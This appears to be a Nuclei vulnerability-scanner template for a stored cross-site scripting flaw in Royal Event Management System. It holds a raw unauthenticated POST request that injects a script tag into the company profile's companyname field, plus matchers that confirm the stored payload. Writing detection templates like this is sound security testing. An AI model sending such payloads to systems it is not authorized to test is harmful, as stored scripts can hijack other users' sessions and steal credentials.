id: royalevent-stored-xss

info:
  name: Royal Event Management System - Stored Cross-Site Scripting
  author: ritikchaddha
  severity: high
  description: |
    Royal Event Management System contains a stored cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://packetstormsecurity.com/files/166479/Royale-Event-Management-System-1.0-Cross-Site-Scripting.html
    - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
  tags: xss,unauthenticated,cms,royalevent,packetstorm

http:
  - raw:
      - |
        POST /royal_event/companyprofile.php HTTP/1.1
        Host: {{Hostname}}

        companyname=%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&regno=test&companyaddress=&companyemail=&country=India&mobilenumber=1234567899&submit=

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'value="><script>alert(document.domain)</script>" >'

      - type: status
        status:
          - 302

# digest: 4a0a00473045022006bc54845a7a21f066f02dc050431d481b61ad70e5e7e16aae4c7dbd95ee6188022100f0a30042ac8f9c8921fb8fc5e2b377d840566fc9a0c717e50f3dcbc5acdc95d6:922c64590222798bb761d5b6d8e72950
